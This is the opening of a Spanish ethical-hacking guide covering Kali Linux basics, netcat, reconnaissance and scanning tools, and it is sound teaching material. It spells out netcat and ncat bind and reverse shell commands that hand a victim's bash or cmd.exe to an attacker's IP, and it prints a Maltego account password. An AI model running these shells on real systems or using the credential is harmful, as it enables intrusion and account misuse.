Ethical Hacking

AUTOR: Ing Daniel Torres Sandi
Security+, CEHv8
[email protected]
CopyLeft
Marzo - 2016
CONVENCIONES USADAS EN LA GUIA
Comandos y resultados de comandos:
nmap -sP 216.27.130.162
find / -iname "*[nombre a buscar]*"
execute -f NetworkPasswordDump32.exe -a -f red.txt -H
Cuando se usa corchetes [] usar datos reales
Parametros importantes son coloreados:
Tips y consejos :
Tip 1
Notas importantes:
Nota 1
Modulo de metasploit equivalente
exploit1multi/handler
Directorio donde tenemos que ejecutar los programas
/root/shell
Archivo de configuracin:
default-lease-time 600;
max-lease-time 7200;
range 192.168.2.51 192.168.2.100;
}
Inyeccion SQL o XSS
-1 UNION ALL SELECT 1,2 --
Sistemas Operativos (Windows)
Versin:
Windows XP Windows 7 Windows 8 Windows 8.1 Windows 10
Windows Windows 2008 Windows Windows
2003 2012 2012R2
Sistemas Operativos (Linux)
Distribucin:
Basados en Basados en paquetes
paquetes DEB RPM
Privilegios
Tipo de
permiso:
Usuarios Permisos elevados
comunes (admin)
I. ENTORNO DE KALI LINUX.................................................................................... 2
1. Estructura de archivos:..................................................................................... 2
1.1. Comandos bsicos............................................................................................. 3
1.2. Actualizar el sistema....................................................................................... 3
1.3. Servicios bsicos.............................................................................................. 4
1.4. Usando tuberas en linux................................................................................ 6
1.5. Configurando la red......................................................................................... 7
1.6. Comandos tiles................................................................................................ 9
1.7. Buscando archivos.......................................................................................... 12
1.8. Permisos y propiedades................................................................................. 13
1.9. Gestin de procesos....................................................................................... 15
II. CONOCIMIENTOS BASICOS............................................................................. 17
2. Terminologa....................................................................................................... 17
2.1. Sistemas numricos....................................................................................... 19
2.2. Codificaciones................................................................................................ 20
2.3. Herramientas bsicas...................................................................................22
2.3.1. Netcat.......................................................................................................... 22
2.3.2. Wireshark.................................................................................................... 23
2.3.3. Netcat encriptado..................................................................................... 25
2.4. Tipos de shell................................................................................................. 26
2.4.1. SHELL DIRECTA (bind shell)..................................................................26
2.4.2. SHELL REVERSA (reverse shell)........................................................... 27
III. RECOLECCION DE INFORMACION................................................................. 30
3. Puertos relevantes........................................................................................... 30
3.1. Pasiva................................................................................................................ 30
3.2. Activa............................................................................................................... 35
3.2.1. DNS............................................................................................................... 35
3.2.2. SNMP............................................................................................................ 36
3.2.3. SMB............................................................................................................... 38
3.2.4. SSL/TL......................................................................................................... 40
3.2.5. SMTP............................................................................................................ 40
IV. ESCANEOS..............................................................................................................42
4. Escaneadores de redes................................................................................... 42
4.1. ARP................................................................................................................... 42
4.2. Traceroute...................................................................................................... 42
4.2.1. Nmap............................................................................................................. 43
4.2.2. Otras herramientas...................................................................................44
4.3. Escaneadores de vulnerabilidades.............................................................46
4.4. Escaneador de vulnerabilidades en aplicaciones web............................47
4.5. Escaneador de configuraciones errneas................................................ 49
V. ATAQUES EN REDES LAN.................................................................................... 51
5. Saltando VLANs................................................................................................ 51
5.1. Switch spoofing (Trunk 802.1Q)................................................................ 51
5.2. Sniffing pasivo................................................................................................51
5.3. Sniffing activo............................................................................................... 52
5.4. DHCP falso...................................................................................................... 54
5.5. Otros ataques LAN....................................................................................... 55
VI. METASPLOIT.......................................................................................................... 57
6. Tipos de mdulos.............................................................................................. 57
6.1. Comando bsicos de metasploit................................................................. 58
6.2. Uso bsico....................................................................................................... 59
6.3. Creando backdoors....................................................................................... 60
6.3.1. Windows....................................................................................................... 60
6.3.1.1. Recibir shell.............................................................................................. 61
6.3.2. Linux.............................................................................................................. 62
6.3.2.1. Recibir shell............................................................................................. 62
6.4. Exploits comunes........................................................................................... 62
6.5. Comandos bsicos de meterpreter (Meta-Interpreter)..................... 63
6.6. Otros payloads............................................................................................... 64
6.7. Atacando al cliente....................................................................................... 65
6.8. Elevar privilegios........................................................................................... 67
6.8.1. Windows....................................................................................................... 67
6.8.2. Linux.............................................................................................................. 68
6.9. Post explotacin............................................................................................ 69
6.9.1. Windows PowerShell................................................................................. 69
6.9.2. Keylogger y sniffer.................................................................................... 71
6.9.3. Recolectar credenciales almacenadas................................................... 72
6.9.4. Extraer password y hashes de memoria...............................................74
6.9.5. Pass the hash.............................................................................................. 76
6.10. Acceder a redes internas:........................................................................ 76
6.10.1. Port forwarding........................................................................................ 77
6.10.2. Pivotear...................................................................................................... 78
6.11. Persistencia.................................................................................................. 80
6.12. Borrar huellas............................................................................................... 81
6.12.1. Manipulacin de fecha de creacin/acceso....................................... 82
VII. DESARROLLO DE EXPLOITS.............................................................................84
7. Conceptos bsicos............................................................................................ 84
7.1.1. Los registros del CPU............................................................................... 84
7.1.2. Mapa de memoria....................................................................................... 85
7.1.3. Memoria del proceso................................................................................. 86
7.1.4. Stack y Heap............................................................................................... 86
7.2. Tipos de exploit............................................................................................. 89
7.3. Debuggers........................................................................................................ 91
7.3.1. IDA................................................................................................................ 91
7.3.2. Immunity Debugger................................................................................... 93
7.4. Protecciones contra exploits...................................................................... 96
7.5. Desarrollando exploits:................................................................................ 96
7.5.1. Bufferoverflow...........................................................................................96
7.5.2. Structured Exception Handler (SEH )............................................... 105
VIII. ESCALAMIENTO DE PRIVILEGIOS..............................................................112
8. Anillos de proteccin de los sistemas operativos.................................... 112
8.1. Escalamiento en Windows.......................................................................... 113
8.1.1. Enumeracin............................................................................................... 113
8.1.2. Buscar passwords..................................................................................... 114
8.1.3. Buscar autoruns perdidos....................................................................... 115
8.1.4. DLL hijacking Windows (WinXP,Win2003,Win7).............................. 116
8.2. Linux................................................................................................................ 119
8.2.1. Enumeracin............................................................................................... 119
IX. POST EXPLOTACION......................................................................................... 121
9. Comandos windows...........................................................................................121
9.1. Transferencia de archivos......................................................................... 121
9.2. Extraer hashes de Security Account Manager (SAM)...................... 124
9.3. Extraer hashes y password de memoria (LSASS)...............................124
9.4. Escaneo desde la maquina comprometida.............................................. 126
9.5. Borrando huellas.......................................................................................... 127
X. PASSWORD ATTACKS.........................................................................................130
10. Online............................................................................................................... 130
10.1. Ataque de diccionario................................................................................ 131
10.1.1. Password profiling................................................................................... 131
10.2. Crakeando passwords usando GPU......................................................... 134
10.3. Pass the hash.............................................................................................. 137
10.4. Ataques online............................................................................................ 138
XI. HACKING WEB APPLICATIONS...................................................................... 141
11. Identificar puntos de entrada....................................................................141
11.1. XSS (Cross-site scripting)...................................................................... 142
11.1.1. Frameworks de explotacin................................................................. 145
11.2. INYECCION SQL...................................................................................... 147
11.2.1. Tipos de SQLi..........................................................................................150
11.2.2. ERROR BASED........................................................................................ 150
11.2.3. UNION BASED....................................................................................... 152
11.3. Control de acceso.......................................................................................157
11.4. Usar componentes vulnerables............................................................... 157
11.5. Web backdoors.......................................................................................... 159
XII. PORT REDIRECTION & TUNNELING............................................................ 161
12. Port Fordwarding........................................................................................... 161
12.1. Tneles SSH............................................................................................... 164
12.1.1. SSH Tunneling - Local........................................................................... 164
12.1.2. SSH Tunneling Remoto..........................................................................165
12.1.3. Dynamic Port Forwarding......................................................................168
12.2. Tnel HTTP................................................................................................. 172
XIII. DENEGACION DE SERVICIO (DoS)............................................................. 176
13. Ataques basados en volumen...................................................................... 176
13.1. Ataques a protocolo.................................................................................. 178
13.2. Ataques a nivel de aplicacin...................................................................179
XIV. EVADIENDO IDS/IPS,FIREWALL Y ANTIVIRUS.................................. 182
14. Antivirus.......................................................................................................... 182
14.1.1. Encriptadores/Ofuscadores................................................................ 182
14.1.2. Frameworks..............................................................................................183
XV. ATTACKING WIRELESS.................................................................................. 188
15. Monitoriar redes........................................................................................... 188
15.1. Atacando WPS (WiFi Protected Setup)............................................... 189
15.1.1. WPS Pixie dust attack.......................................................................... 189
15.1.2. Fuerza bruta............................................................................................ 190
15.2. Atacando WPA............................................................................................ 191
15.2.1. Cambiar de direccin MAC................................................................... 192
15.3. Atacando WEP............................................................................................ 192
XVI. CIBER-SEGURIDAD.......................................................................................... 195
16. Historia............................................................................................................195
16.1. Advanced Persistent Threat (APT)....................................................... 196
16.2. Uso de armas 0-day................................................................................... 198
16.3. Espionaje de otros pases........................................................................ 198
XVII. Anexos................................................................................................................. 201
17. Compilando programas (C++)....................................................................... 201
17.1. Usando Visual Studio................................................................................ 204
17.2. Usando !mona.............................................................................................. 207
17.3. Diferencias entre bases de datos......................................................... 207
17.4. Variables internas de bases de datos.................................................. 208
17.5. Explotacin automtica (sqlmap)........................................................... 208
17.6. Probar tipos de datos para la inyeccin............................................... 209
17.7. Archivos comprimidos............................................................................... 210
17.7.1. Desempacar zip en maquina remota................................................... 212
17.8. Enviando una Reverse shell (linux)......................................................... 212
XVIII. GLOSARIO........................................................................................................ 215
ETHICAL HACKING
1
ENTORNO DE KALI
LINUX
1
ETHICAL HACKING
I. ENTORNO DE KALI LINUX
Kali Linux es una distribucin basada en Debian GNU/Linux diseada

principalmente para la auditara y seguridad informtica en general. Fue
fundada y es mantenida por Offensive Security.
Las credenciales por defecto son:
Username: root
Password: toor
1. Estructura de archivos:
Directorio Descripcin
/usr/bin Este es el directorio principal de los programas ejecutables
de linux.
/usr/share/ Este directorio contiene las herramientas de KALI
/dev Archivos de dispositivos Linux disco duro, red, etc.
/etc Archivos de configuracin de Linux. Si instala algo tiene que
configurar aqu
/home Directorio "Hogar" de los usuarios del sistema
/root Directorio "Hogar" del usuario root
/tmp Archivos de Linux temporales
/opt Software Linux instalado (no desde el repositorio)
Directorio de exploits (Cdigo fuente):

/usr/share/exploitdb/platforms/
Exploits compilados
/usr/share/exploits/
2
ETHICAL HACKING
Directorio de webshells
/opt/web/webshells/
Directorio de passwords
/usr/share/wordlist
1.1. Comandos bsicos
Comando Descripcin Ejemplo

ls listar directorio ls
ls -al listar archivos ocultos ls -al
cd cambiar de directorio cd directorio
pwd mostrar directorio actual pwd
mkdir crear directorio mkdir directorio
rm Borrar archivo rm archivo
rm -rf Forzar borrado de manera rm -rf directorio
recursiva
cp copiar archivos cp archivo1 archivo2
mv Mover archivos mv archivo1 archivo2
touch Crear archivo touch archivo
cat Mostrar contenido de archivo cat archivo
ps aux Mostrar procesos ejecutndose ps aux
Kill -9 Matar proceso Kill -9 1234
ln -s Crear link simblico ln -s archivo link
1.2. Actualizar el sistema
Actualizar la lista de paquetes
apt-get update
3
ETHICAL HACKING
Actualizar el sistema
apt-get upgrade
1.3. Servicios bsicos
SSH
service ssh start
service ssh stop
WEB (/var/www)
service apache2 start
service apache2 stop
FTP (/ftphome)
service pure-ftpd start
service pure-ftpd stop
DHCP
Archivo de configuracin: /etc/dhcp/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {

option subnet-mask 255.255.255.0;
option domain-name "locahost";
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
4
ETHICAL HACKING
Iniciar el servicio:
dhcpd -cf /etc/dhcp/dhcpd.conf eth0
Para poder enrutear paquetes:

echo 1 > /proc/sys/net/ipv4/ip_forward
Revisar puertos abiertos
Confirmar que se inicio los servicios (TCP)
netstat -antp | grep 80
-a: Mostrar todas las conexiones

-n: Mostrar formato numrico
-p: Mostrar los programas asociados al proceso
Confirmar que se inicio los servicios (UDP)
netstat -auntp | grep 69
u: Mostrar conexiones UDP
Servicios que se ejecutan al inicio del sistema
Listar servicios:
chkconfig --list
Niveles de ejecucin de linux:

0: Apagado
1: Mono usuario sin soperte de red (Recuperacin)
5
ETHICAL HACKING
3: Inicio normal del sistema

6: Reinicio
Configurar servicio para que se ejecute al inicio

cd /etc/init.d/
update-rc.d apache2 defaults
Configurar servicio para que NO se ejecute al inicio

cd /etc/init.d/
update-rc.d -f apache2 remove
Configurar modo grfico

sysv-rc-conf
rcconf
1.4. Usando tuberas en linux
Comunicacin estndar en linux. Linux tiene tres formas estndar para

comunicarse:
Entrada estndar: generalmente asociado con el teclado

Salida estndar: Se utiliza para mostrar informacin asociada
generalmente con el monitor
Salida de error estndar: generalmente asociado con la salida estndar
Podemos redirigir la comunicacin estndar linux:
Operador Funcin
< Redirigir la entrada estndar
> Redireccionar la salida estndar
>> Redireccionar la salida estndar (no destructivo)
2> Redirigir la salida de error estndar
6
ETHICAL HACKING
Ejemplos:
tuberas:
Con tuberas que podemos utilizar la salida de un proceso como la entrada de
otro proceso.
Ejemplo 1:
ls | wc -l > lista.txt
Paso a paso
ls : listar el directorio
wc -l : contar las lneas de la lista
> lista.txt : escribir el resultado en un archivo
Cada vez que se ejecuta este comando el contenido del archivo se sobrescribe.
Si desea guardar el uso resultado anterior:
ls | wc -l >> lista.txt
Ejecucin paralela y secuencial de comandos
Paralela:
sleep 5 & echo "hola1" & sleep 5 & echo "hola2"
Secuencial:
sleep 5 ; echo "hola1" ; sleep 5 ; echo "hola2"
1.5. Configurando la red
Habilitar interface
ifconfig eth0 up
7
ETHICAL HACKING
Deshabilitar interface
ifconfig eth0 down
Configurar IP Temporal
ifconfig eth0 192.168.0.10
Configurar IP esttico
Editar el archivo /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.11.10
netmask 255.255.255.0
Actualizar IP
/etc/init.d/networking restart
Configurar dinmico (DHCP)
dhclient eth0
Adicionar gateway
route add default gw 192.168.0.1
8
ETHICAL HACKING
Adicionar servidor DNS
Modificar el archivo /etc/resolv.conf con:
nameserver 8.8.8.8
1.6. Comandos tiles
Grep
Imprime lineas que cumplen un patrn
Imprimir lineas que tengan la palabra Apache
grep -i Apache archivo.txt
-i : No hace diferencias entre maysculas y minsculas
Imprimir lineas que NO tengan la palabra apache
grep -v apache archivo.txt
-v : Seleccin inversa
Imprimir lineas que NO tengan la palabra apache, iss
egrep -v apache|iss archivo.txt
Busca recursivamente en cada carpeta la palabra apache
grep -r apache *
-r buscar recursivamente
Tr
9
ETHICAL HACKING
Reemplaza una caracter o mas:
echo "hola, hola2" | tr 'hola' 'chau'
Sed
Sustitucin de texto
Substituye las palabras antiguo por nuevo en archivo.txt

sed -i 's/antiguo /nuevo /g' archivo.txt
sed -i 's/conf/back/g' archivo.txt
Substituye las palabras antiguo por nuevo de la salida estndar
head archivo.txt | sed s/conf/back/g
Uniq:
Elimina elementos duplicados de una lista
sort lista.txt | uniq -i > final.txt
-i: No toma en cuenta mayusculas/minusculas
Cut
Filtrar salida por campos
-d definir delimitador
-f Definir campo a mostrar
Delimitador ; y muestra el primer campo
cut -d ; -f 1
10
ETHICAL HACKING
Delimitador espacio blanco y muestra del primer al tercer campo
cut -d -f 1-3
Ejemplo:
host blogs.cisco.com | grep "has address" | cut -d " " -f 4
Awk
Filtra la salida parecido a cut, pero usa de delimitador mltiples espacios

Ej: Mostrar gateway por defecto
route -n | grep 'UG' | awk '{print $2}'
Ej: Mostrar cuanta memoria RAM disponible existe
free -m | grep -i mem | awk '{print $4}'
Watch
Ejecuta un comando cada X segundos
watch -n 10 date
-n 10 : Ejecutar cada 10 segundos

date: comando a ejecutar
Diff
Muestra la diferencia entre dos archivos (compara linea a linea)
diff archivo1.txt archivo2.txt
SCP
11
ETHICAL HACKING
Copia de archivos de manera segura a servidores remotos
Archivo remoto a maquina local

scp [email protected]:foobar.txt /root/local
Un archivo local a servidor remoto

scp foobar.txt [email protected]:/root/remote/
1.7. Buscando archivos
locate:
El comando locate lee una o mas bases de datos preparadas por el comando
updatedb
updatedb
locate nc.exe
which:
which busca archivos en los directorios de comandos ejecutables.
which sbd
which nc
Find:
Buscar archivos
Buscar archivos con [nombre a buscar] en el directorio / sin diferenciar

maysculas y minsculas
find / -iname "*[nombre a buscar]*"
12
ETHICAL HACKING
find . -iname "*index*"
. (punto): Directorio actual

-iname: Nombre del archivo a buscar
Buscar archivos por extensin
find . -name "*.cap"
Por cada archivo encontrado ejecutar el comando file
find / -iname sbd* -exec file {} \;
1.8. Permisos y propiedades
a) Propiedad en linux
Cada archivo y carpeta pertenece a un usuario y un grupo
ls -l archivo.txt
Donde:
-rw-r-xrwx usuario grupo 4096 2009-04-02 11:21 archivo.txt
b) Permisos Linux
Linux tiene tres tipos de permiso de lectura (R), escritura (W) y ejecucin
(X). Los permisos se muestran en el siguiente orden: Propietario, Grupo y
Otros
-rwx rwx rwx usuario grupo 4096 2009-04-02 11:21 archivo.txt
Persisos de:
Propietario
Grupo
Otros
El permiso para este archivo son: rwx rwx rwx
13
ETHICAL HACKING
Propietario Grupo Otros

r-x rwx rwx
4+2+1 4+2+1 4+2+1
7 7 7
donde:
r=4
w=2
x=1
Cambiar permisos en linux
Conceder permisos de lectura a todos (propietario,grupo,otros)
chmod +r archivo.txt
Conceder permisos de escritura a todos (propietario,grupo,otros)
chmod +w archivo.txt
Conceder permisos de ejecucin a todos (propietario,grupo,otros)
chmod +x archivo.txt
Conceder permisos de ejecucin slo para el propietario
chmod u+x archivo.txt
Conceder permisos de ejecucin slo para el grupo
chmod g+x archivo.txt
Conceder permisos de ejecucin slo para otros
chmod o+x archivo.txt
Puede especificar los permisos de forma numrica:
14
ETHICAL HACKING
chmod 777 archivo.txt
1.9. Gestin de procesos
En Linux, cada proceso o demonio que se ejecuta se le da un nmero de

identidad llamado PID (identificador de proceso). El identificador del proceso
es nico.
Ver todos los procesos de linux ejecutndose
ps aux
Para ver un rbol de procesos
pstree
Para ver los procesos en tiempo real
top
htop
init es el proceso padre
Matar un proceso por su PID
Kill -9 3834
3834 = [PID]
15
ETHICAL HACKING
2
CONOCIMIENTOS
BSICOS
16
ETHICAL HACKING
II. CONOCIMIENTOS BASICOS

2. Terminologa
Vulnerabilidad
Existencia de un error de diseo o implementacin que puede conducir a
un evento indeseable o inesperado comprometiendo la seguridad del
sistema
Ejemplo: Inyeccin SQL, software antiguo, etc
Las vulnerabilidad conocidas tienen una codificacin que varia
dependiendo a quien las clasifica. Ejemplo:
Vulnerabilidad Microsoft Server Service Relative Path Stack
Corruption
Cdigo CVE CVE-2008-4250
Cdigo MS08-067
Microsoft
Exploit
Es una manera definida de comprometer la seguridad de un sistema
mediante la explotacin de una vulnerabilidad. Generalmente es un
script hecho en cualquier lenguaje (python, perl, C++, ruby, etc)
17
ETHICAL HACKING
Payload
Es la parte de cdigo de un exploit, que tiene de objetivo ejecutarse en la
maquina victima para realizar una accin generalmente determinada
(Enviar una shell remota, crear un usuario, etc).
Fig 1: Exploit hecho en python
Ataque Zero-day
Cuando el fabricante no tiene conocimiento de la vulnerabilidad de su

software entonces tenemos un zero-day.
Un ataque puede explotar esta vulnerabilidad del sistema porque no
existe el parche para la vulnerabilidad.
18
ETHICAL HACKING
Existe empresas que se dedican a vender 0-days:

http://www.vupen.com/english/
Advanced Persistent Threat (APT)
Una amenaza persistente avanzada (APT ), esta dirigida a penetrar la

seguridad informtica de una entidad especfica.
Una APT, generalmente, fija sus objetivos en organizaciones o
naciones por motivos de negocios o polticos.
El proceso avanzado involucra sofisticadas tcnicas que utilizan
software malicioso para explotar vulnerabilidades en los sistemas.
Falso positivo
Es cuando creemos que es una vulnerabilidad pero realmente NO lo es
Falso negativo
Es cuando NO identificamos una vulnerabilidad y pasa desapercibido.
2.1. Sistemas numricos
Binario
Se representan utilizando solamente las cifras cero y uno (0 y 1).
Hexadecimal
Tiene como base 16

Son los dgitos numricos 0-9 y las letras A-F.
En la mayora de los lenguajes de programacin, los valores
hexadecimales se pueden distinguir por las letras 0x delante de ellos.
Ejemplos:
19
ETHICAL HACKING
Decimal Hexadecimal Binario

4 4 100
10 A 1010
44 2C 101100
Usar la calculadora de linux en modo Programacin
2.2. Codificaciones
ASCII
Las computadoras solamente entienden nmeros. El cdigo ASCII es una

representacin numrica de caracteres
Carcter Decimal Hexadecimal

@ 64 40
Formatos de la codificacin hexadecimal
20
ETHICAL HACKING
Texto plano Hexadecimal ASCII Hexadecimal formateado

0x3c486f6c61206d756e64 \x3c\x48\x6f\x6c\x61\x20\x
<Hola mundo!
6f21 6d\x75\x6e\x64\x6f\x21
* Usado en inyecciones SQL * Usado en payloads de exploits
Usar herramienta burpsuite > decoder
Codificacin URL
Codificacin Simple Codificacin completa

RAW URL
(full)
<Hola %3c%48%6f%6c%61%20
%3CHola+mundo%21 %3CHola%20mundo%21
mundo! %6d%75%6e%64%6f%21
Usar herramienta burpsuite > decoder
Ejemplo:
cve.mitre.org/cgi-bin/cvekey.cgi?keyword=linux
Codificando:
http://cve.mitre.org/cgi-bin/cvekey.cgi?%6b%65%79%77%6f%72%64=
%6c%69%6e%75%78
21
ETHICAL HACKING
UNICODE
Unicode incluye caracteres de todos los alfabetos.

Unicode incluye sistemas de escritura modernos como: rabe, griego,
latino, etc. Ademas de escrituras extintas
Unicode puede ser implementado por diferentes codificaciones de

caracteres. Las ms utilizados son UTF-8, UTF-16. Utilizado para exploits
unicode
Carcter Unicode
A 0041
& 0026
b 0062
4e2d
Usar https://www.branah.com/unicode-converter
2.3. Herramientas bsicas

2.3.1.Netcat
Netcat es una herramienta de red que permite a travs de intrprete de

comandos abrir puertos TCP/UDP en un HOST , asociar una shell a un puerto
en concreto, forzar conexiones UDP/TCP para realizar transferencias de
archivos.
Netcat - Recoleccin de Banners
nc -nv 66.172.10.69 80
22
ETHICAL HACKING
HEAD HTTP/1.1
-n: Formato numrico

-v: Modo verbose
Recoleccin de banners de un rango de puertos
echo "" | nc -v -n -w1 66.172.10.69 21-80
Escaneo de puertos (TCP)
nc -vv -z -w2 66.172.10.69 21-81
-vv: Verbose
-z: Modo escaneo
-w: Tiempo mximo de espera (segundos)
Netcat - Escuchar puerto
nc -nlvp [puerto]
-l: Modo escucha

-p: Especificar puerto
Verificar que abrimos el puerto:
netstat -anp | grep tcp
2.3.2. Wireshark
Wireshark es un analizador de protocolos utilizado para realizar anlisis y

solucionar problemas en redes de comunicaciones y como una herramienta
didctica.
23
ETHICAL HACKING
Filtro de protocolos
Arp
http
Dns
DHCP --> bootp.option.type == 53
Filtrar por IP/puerto

ip.addr == [IP]
ip.addr == [IP] or ip.addr == [IP2]
tcp.port eq [port]
No mostrar trafico arp ni icmp

! (arp or icmp)
Mostrar paquetes con cookies

Http.cookies
Por flags
tcp.flogs.syn
Mostrar paquetes con mtodos POST

http.request.method == "POST"
Buscar [string] en el flujo TCP

tcp contains [string]
Ej
tcp contains cisco
24
ETHICAL HACKING
2.3.3.Netcat encriptado
Bind Shell
Victima abre un puerto atado a una shell (Windows)
ncat.exe --exec cmd.exe --allow 192.168.0.106 -vnl 4444 --ssl
Atacante se conecta a la shell (Linux)
ncat -v 192.168.0.103 4444 -ssl
Reverse shell
Atacante abre un puerto esperando la shell (Linux)
ncat -vnl 4444 --ssl
Victima enva la shell (Windows)
ncat.exe --exec cmd.exe -v 192.168.0.106 4444 -ssl
25
ETHICAL HACKING
2.4. Tipos de shell

2.4.1.SHELL DIRECTA (bind shell)
Netcat - shell directa (Victima linux)
Victima abre un puerto atado a una shell
nc -nlvp [puerto] -e /bin/bash
Atacante se conecta a la shell
nc nv [IP] [puerto]
26
ETHICAL HACKING
Netcat - shell directa (Victima windows)
Victima abre un puerto atado a una shell (Windows)
nc.exe -nlvp [puerto] -e cmd.exe
Atacante se conecta a la shell (Linux)
nc nv [IP] [puerto]
2.4.2. SHELL REVERSA (reverse shell)
27
ETHICAL HACKING
Netcat - shell reversa (Victima windows)
Atacante abre un puerto esperando la shell (Linux)
nc -nlvp [puerto]
Victima enva la shell (Windows)
nc.exe -nv [IP] [puerto] -e cmd.exe
Netcat - shell reversa (Victima linux)
Atacante abre un puerto esperando la shell
nc -nlvp [puerto]
Victima enva la shell

nc -nv [IP] [puerto] -e /bin/bash
28
ETHICAL HACKING
3
RECOLECCION DE
INFORMACION
29
ETHICAL HACKING
III. RECOLECCION DE INFORMACION

3. Puertos relevantes
Servicio Puerto Servicio Puerto

FTP data 20/TCP SNMP 161/162 UDP
FTP control 21/TCP HTTPS 443
SFTP, SSH,SCP 22/TCP SMB 445
Telnet 23/TCP Ipsec (VPN) 500
SMTP 25 TCP SMTPS 465/TCP
SMTP 587 TCP FTPS 990/989
DNS 53/TCP/UDP IMAPS 993
DHCP 67 UDP POP3S 995
HTTP 80/TCP Oracle 1036 /TCP
POP3 110 TCP MSSQL 1433/TCP
RCP 135 TCP MySQL 3306/TCP
NetBios 137,138 UDP , MongoDB 27017/TCP
139 TCP
IMAP 143 TCP
Webmin 10000/TCP
3.1. Pasiva
OSINT consiste en usar informacin libremente disponible (sitios de internet,

redes sociales, etc) y transformarla en informacin til
30
ETHICAL HACKING
Network Miner
Con esta herramienta podemos analizar trafico capturado por wireshark

(Guardar en .pcap)
/opt/NetworkMiner
mono NetworkMiner.exe
31
ETHICAL HACKING
Maltego
Credenciales:
Usuarios: [email protected]
Password: cognos2015
Archive.org
Este sitio web mantiene una bitcora de paginas web. Si en un momento

dado nuestra aplicacin web expuso informacin sensible podemos
encontrar estos datos aqu aun si ya actualizamos nuestro sitio web.
theharvester
Recoleccin de emails y subdominios (google)
theharvester -d [dominio] -b google > google.txt
-d: dominio
-b: buscador
32
ETHICAL HACKING
Recoleccin de emails y subdominios (bing)
theharvester -d [dominio] -b bing > bing.txt
dmitry
whois, subdomains, mails
dmitry -w -e -n -s [dominio] -o resultado_dmitry.txt
-w: whois
-n: netcraft.com (OS, informacin del servidor web)
-e: Buscar emails
-s: Buscar subdominios
Foca (Windows 7)
Extraer meta-datos de doumentos office y pdf
C:\Users\myuser\Desktop\FocaPro\bin
33
ETHICAL HACKING
Recon-ng
Direcciones para obtener APIs
Servicio
http://ipinfodb.com/account.php API Key
http://www.shodanhq.com/home API Key
Iniciar el framework
recon-ng
Subdominios adicionales
use recon/domains-hosts/netcraft
set SOURCE cisco.com
run
Host virtuales en el mismo servidor
use recon/hosts-hosts/ip_neighbor
set SOURCE cisco.com
run
Resolver dominios a IPs
use recon/hosts-hosts/resolve
run
Informacin de IPs
use recon/hosts-hosts/ipinfodb
run
34
ETHICAL HACKING
SHODAN
https://www.shodan.io
country:"BO"
hostname:.gob.bo
net:"190.129.95.0/24"
3.2. Activa
3.2.1. DNS
[dominio] = megacorpone.com
Enumeracin general del dominio (DNSSEC, SPF,etc) con dnsrecon
dnsrecon -d [dominio]
dnsenum
dnsenum [dominio]
Obtiene:
servidores de nombres
Servidores de correo
Intentar transferencia de zona
Fierce
fierce -dns [dominio] -threads 3
Intenta transferencia de zona
35
ETHICAL HACKING
Fuerza bruta de subdominios (/usr/share/fierce/hosts.txt)
Descubrir dominios adicionales mediante resolucin inversa:
Resolver de manera inversa
dnsrecon -r 190.129.72.1/24
http://reverseip.domaintools.com/search/?q=190.129.72.%
Enumeracin IPv6
dnsdict6 -d google.com
-d: Mostrar informacin de los registros NS y MX
3.2.2. SNMP
Simple Network Management Protocol (SNMP) es un protocolo estndar de

Internet para recopilar y organizar informacin acerca de los dispositivos
gestionados en redes IP.
Trminos:
MIB (Management Information Base) es una coleccin de informacin

organizada Jerrquicamente.
OIDs (Object Identifiers) Identifican de manera nica a los objetos en el
rbol MIB.
36
ETHICAL HACKING
onesixtyone
onesixtyone -c /usr/share/passwords/community-string.txt -i ips.txt
-c: Archivo con la lista de community strings

-i: Archivo con la lista de IPs
Una vez que sepamos que community string podemos usar, empleamos otros
scripts para obtener mas informacin
Snmpwalk
/usr/share/snmpenum/
python snmpenum.py 192.168.80.139 public linux.txt
Plataformas:
Windows.txt
Cisco.txt
linux.txt
37
ETHICAL HACKING
mibbrowser
/opt/enumeration/snmp/mibbrowser
bash browser.sh
Usar RCF1213.mib
3.2.3.SMB
En las redes de computadoras, Server Message Block (SMB) opera como un

protocolo de red de capa de aplicacin utilizado principalmente para
proporcionar acceso compartido a archivos e impresoras.
Escanear en busca host con smb activo
nbtscan -hv 192.168.11.0/24
RID cycling attack
En un ataque RID cycling se intenta enumerar las cuentas de usuario a travs

de las sesiones nulas y usando SID y RID .
SID (Security Identifier)
S-1-5-21-4064627337-2434140041-2375368561-1036.
S: Identifica la cadena como SID.

1: Nivel de revisin. (Siempre es 1)
5: Valor de identificador de autoridad. 5 representa
SECURITY_NT_AUTHORITY.
21-4064627337-2434140041-2375368561: Identificador de
38
ETHICAL HACKING
dominio
1036: Relative ID (RID) Identifica a un grupo o usuario
Microsoft SIDs
500 Built-in Local administrator
501 Built-in Local guest
512 Built-in Domain administrator
Los nmeros mayores a 1000 se reservan para las cuentas de usuario.
Linux SIDs
Root UID, GID 0
0-999 cuentas propias de la mquina.
Los nmeros mayores a 500 se reservan para las cuentas de usuario.
Los nmeros mayores a 1000 se reservan para las cuentas de usuario
enum4linux -U -G -o -r -n -R 0-25,500-525,1000-1025,3000-3025 [IP]
-U get userlist
-G get group and member list
-o Get OS information
-r enumerate users via RID cycling
-n Do an nmblookup (similar to nbtstat)
39
ETHICAL HACKING
3.2.4.SSL/TL
sslscan www.ekoparty.org:443
3.2.5. SMTP
Mediante el uso del comando VRFY podemos usar una lista de posibles usuarios
para comprobar cuales existen en el servidor.
smtp-user-enum -M VRFY -U users.txt -t [Direccin_IP]
Listado de usuarios:
/usr/share/wordlists/usuarios.txt (espaol)
/usr/share/wordlists/metasploit/unix_users.txt
40
ETHICAL HACKING
4
ESCANEOS
41
ETHICAL HACKING
IV.ESCANEOS
4. Escaneadores de redes
4.1. ARP
Descubrir host de manera pasiva (ARP)
netdiscover -p -r 192.168.2.0/24
Escaneo ARP
arp-scan eth0 192.168.2.0/24
arping 192.168.56.102
4.2. Traceroute
TCP SYN port 80
tctrace -i eth0 -d scanme.nmap.org
ICMP
traceroute scanme.nmap.org
42
ETHICAL HACKING
4.2.1.Nmap
Escaneos TCP
Nmap - Barrido IP (sistemas vivos)
nmap -sP 192.168.1.100-150
En un LAN nmap usa paquetes ARP
En una WAN nmap usa :

ICMP ECHO_REQUEST
TCP port 80 ACK
TCP SYN to port 443
ICMP timestamp
Escaneo activo
nmap -A 192.168.1.12
Este escaneo activa las opciones
OS detection
version detection
script scanning
